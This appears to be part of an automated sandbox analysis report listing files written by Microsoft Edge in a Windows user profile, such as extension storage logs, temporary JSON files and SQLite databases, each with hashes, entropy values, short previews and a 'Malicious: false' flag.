                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):438
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.228145048335997
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:7drvVaYebvqBQFUtvR1/phz5OaYebvqBvJ:7drVaYebvZgvFTOaYebvk
                                                                                                                                                                                                                                                                                                                            MD5:B851201AEF3ADD0CFBA8633D12893FC4
                                                                                                                                                                                                                                                                                                                            SHA1:FC2AF89074BF9EACBC788FCADEB8EB48F5A7984F
                                                                                                                                                                                                                                                                                                                            SHA-256:A1476606CA3D2DA5C2EBABCA9CC16B4A933A700E1F79DE4254FF531334D159A6
                                                                                                                                                                                                                                                                                                                            SHA-512:3CD152B001E5C3D717BC2FD2ED82F8E970BD0C040FB7F80EC077D35A1858B50A3FCF13E6F32959B37E2D9FB01AD19771819B393B8FE8C8F739B069E321FDA2A9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.324 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:39:16.327 1e58 Recovering log #3.2025/01/05-02:39:16.330 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):438
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.228145048335997
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:7drvVaYebvqBQFUtvR1/phz5OaYebvqBvJ:7drVaYebvZgvFTOaYebvk
                                                                                                                                                                                                                                                                                                                            MD5:B851201AEF3ADD0CFBA8633D12893FC4
                                                                                                                                                                                                                                                                                                                            SHA1:FC2AF89074BF9EACBC788FCADEB8EB48F5A7984F
                                                                                                                                                                                                                                                                                                                            SHA-256:A1476606CA3D2DA5C2EBABCA9CC16B4A933A700E1F79DE4254FF531334D159A6
                                                                                                                                                                                                                                                                                                                            SHA-512:3CD152B001E5C3D717BC2FD2ED82F8E970BD0C040FB7F80EC077D35A1858B50A3FCF13E6F32959B37E2D9FB01AD19771819B393B8FE8C8F739B069E321FDA2A9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.324 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:39:16.327 1e58 Recovering log #3.2025/01/05-02:39:16.330 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\1c7df03b-0824-4122-8317-88b36b658cfc.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2c3e13f4-aecd-472e-8ab4-ef3ac1e098d3.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7faeaba9-e657-45fb-96ad-6907bd8945de.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3a25b.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3a6a1.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                            MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                            SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                            SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                            SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\eafa0937-a9bb-46a0-bfd6-b825b50e6576.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):80
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                            MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                            SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                            SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                            SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.1827195470583955
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHQlL+q2PN723oH+TcwtzjqEKj0QMxIFUtt0PQT1ZmwDmLVkwON723oH+Tcwtzv:7wIvVaYebvqBZFUtB1/e5OaYebvqBaJ
                                                                                                                                                                                                                                                                                                                            MD5:15C5B7082AE42A8AEEADADD0ADDE8914
                                                                                                                                                                                                                                                                                                                            SHA1:D2679FF4DC726F0FCD67E6F046BD70071716872D
                                                                                                                                                                                                                                                                                                                            SHA-256:1A4587BB9829EAA400D77D22E64805E99484B29940605D0A6E5EAF1BE121D7B7
                                                                                                                                                                                                                                                                                                                            SHA-512:55DD190E5B3C9C45F9840A2A2DBA74A883C695A714500C87C9D0352F6D71D324B24F14D47ED4A3697841AD669F11E2D42C08C113FA7F5E6CF99351FA2CF03543
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:30.210 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/05-02:39:30.213 1e58 Recovering log #3.2025/01/05-02:39:30.216 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.1827195470583955
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHQlL+q2PN723oH+TcwtzjqEKj0QMxIFUtt0PQT1ZmwDmLVkwON723oH+Tcwtzv:7wIvVaYebvqBZFUtB1/e5OaYebvqBaJ
                                                                                                                                                                                                                                                                                                                            MD5:15C5B7082AE42A8AEEADADD0ADDE8914
                                                                                                                                                                                                                                                                                                                            SHA1:D2679FF4DC726F0FCD67E6F046BD70071716872D
                                                                                                                                                                                                                                                                                                                            SHA-256:1A4587BB9829EAA400D77D22E64805E99484B29940605D0A6E5EAF1BE121D7B7
                                                                                                                                                                                                                                                                                                                            SHA-512:55DD190E5B3C9C45F9840A2A2DBA74A883C695A714500C87C9D0352F6D71D324B24F14D47ED4A3697841AD669F11E2D42C08C113FA7F5E6CF99351FA2CF03543
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:30.210 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/05-02:39:30.213 1e58 Recovering log #3.2025/01/05-02:39:30.216 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.2260822624238665
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfRZ+q2PN723oH+TcwtpIFUttf2eGFZZmwDf2eGFNVkwON723oH+Tcwta/WLJ:7/L+vVaYebmFUt921/z2ZV5OaYebaUJ
                                                                                                                                                                                                                                                                                                                            MD5:B3A9BBB971FAB5CE137585EFA93E35F3
                                                                                                                                                                                                                                                                                                                            SHA1:2E18B3C4C3B756C968224647B3E29323EF7D36AD
                                                                                                                                                                                                                                                                                                                            SHA-256:D63D1F4B9CDE134B04C42BA9AEC1C2257E88CB304FF3A3C3A412A6D8179AF933
                                                                                                                                                                                                                                                                                                                            SHA-512:CF7ED9B2C6F9A8845EB0FECD1F02415953AD79F671D7C3A8237F814D22F2B46E82404DA405CFB2F741D266E57C3691D7917CF02AA6387C19E3E68CD0D3F46A9A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.427 167c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/05-02:39:15.428 167c Recovering log #3.2025/01/05-02:39:15.428 167c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.2260822624238665
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfRZ+q2PN723oH+TcwtpIFUttf2eGFZZmwDf2eGFNVkwON723oH+Tcwta/WLJ:7/L+vVaYebmFUt921/z2ZV5OaYebaUJ
                                                                                                                                                                                                                                                                                                                            MD5:B3A9BBB971FAB5CE137585EFA93E35F3
                                                                                                                                                                                                                                                                                                                            SHA1:2E18B3C4C3B756C968224647B3E29323EF7D36AD
                                                                                                                                                                                                                                                                                                                            SHA-256:D63D1F4B9CDE134B04C42BA9AEC1C2257E88CB304FF3A3C3A412A6D8179AF933
                                                                                                                                                                                                                                                                                                                            SHA-512:CF7ED9B2C6F9A8845EB0FECD1F02415953AD79F671D7C3A8237F814D22F2B46E82404DA405CFB2F741D266E57C3691D7917CF02AA6387C19E3E68CD0D3F46A9A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.427 167c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/05-02:39:15.428 167c Recovering log #3.2025/01/05-02:39:15.428 167c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.2678966348952967
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:384:L/2qOB1nxCkMXSA1LyKOMq+8iP5GDHP/0jMVums:Kq+n0JX91LyKOMq+8iP5GLP/0F
                                                                                                                                                                                                                                                                                                                            MD5:2FCACB2C0B81338150BCC9424EB228E4
                                                                                                                                                                                                                                                                                                                            SHA1:E3AF30631758C1976E59B20CC5C105F1010ACE16
                                                                                                                                                                                                                                                                                                                            SHA-256:F7302BBC7B98ADB3853F0EEA7782C654EC286A9DE331CFC5FABB415C635F0FB9
                                                                                                                                                                                                                                                                                                                            SHA-512:30A5B1ADCDB2045DD7323857D12AC933FBFE5CB27E46D4A2FD0971F7F08143024DE4541622CCF17A379F712108DE4D6BB4F9DC2C9FBBC262A041AE453C5688D5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                                                            MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                                                            SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                                                            SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
